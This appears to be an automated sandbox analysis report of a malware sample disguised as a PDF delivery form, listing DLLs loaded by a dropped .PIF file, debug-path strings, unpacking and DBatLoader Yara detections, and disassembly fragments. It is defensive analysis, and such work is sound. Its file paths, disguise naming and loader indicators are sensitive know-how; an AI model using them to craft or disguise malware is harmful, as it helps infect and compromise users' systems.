Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section loaded: sppc.dll	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Static file information: File size 1362944 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022BDE000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2498473359.0000000022899000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2495014448.00000000226E6000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: xnxcxbpC.pif, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A41000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A12000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008E2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Unpacked PE file: 5.2.xnxcxbpC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Unpacked PE file: 12.2.xnxcxbpC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Unpacked PE file: 18.2.xnxcxbpC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;

Yara detected DBatLoader

Source: Yara match	File source: 0.2.Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe.2cd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2127061894.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2294905471.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2253685238.0000000002406000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: xnxcxbpC.pif.0.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CE87A0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CE87A0

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CD32FC push eax; ret	0_2_02CD3338
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CFC2FC push 02CFC367h; ret	0_2_02CFC35F
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CD635C push 02CD63B7h; ret	0_2_02CD63AF
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CD635A push 02CD63B7h; ret	0_2_02CD63AF
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CFC0AC push 02CFC125h; ret	0_2_02CFC11D
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CFC1F8 push 02CFC288h; ret	0_2_02CFC280
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CFC144 push 02CFC1ECh; ret	0_2_02CFC1E4
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE86C0 push 02CE8702h; ret	0_2_02CE86FA
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CD6740 push 02CD6782h; ret	0_2_02CD677A
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CD673E push 02CD6782h; ret	0_2_02CD677A
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CDC4F4 push ecx; mov dword ptr [esp], edx	0_2_02CDC4F9
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CEE5B4 push ecx; mov dword ptr [esp], edx	0_2_02CEE5B9
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CDD528 push 02CDD554h; ret	0_2_02CDD54C
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CFBB6C push 02CFBD94h; ret	0_2_02CFBD8C
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CDCB6B push 02CDCCFAh; ret	0_2_02CDCCF2
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CDCB74 push 02CDCCFAh; ret	0_2_02CDCCF2
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE68CE push 02CE697Bh; ret	0_2_02CE6973
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE68D0 push 02CE697Bh; ret	0_2_02CE6973
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE7894 push 02CE7911h; ret	0_2_02CE7909
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CEA91F push 02CEA958h; ret	0_2_02CEA950
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE8918 push 02CE8950h; ret	0_2_02CE8948
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE8916 push 02CE8950h; ret	0_2_02CE8948
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CEA920 push 02CEA958h; ret	0_2_02CEA950
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE2EE8 push 02CE2F5Eh; ret	0_2_02CE2F56
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE5E04 push ecx; mov dword ptr [esp], edx	0_2_02CE5E06
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE2FF4 push 02CE3041h; ret	0_2_02CE3039
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE2FF3 push 02CE3041h; ret	0_2_02CE3039
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0040D99D push esp; iretd	5_2_0040D99E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_00416373 push ds; iretd	5_2_00416372
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_00416305 push ds; iretd	5_2_00416372
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_004163B1 push ds; iretd	5_2_00416372

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

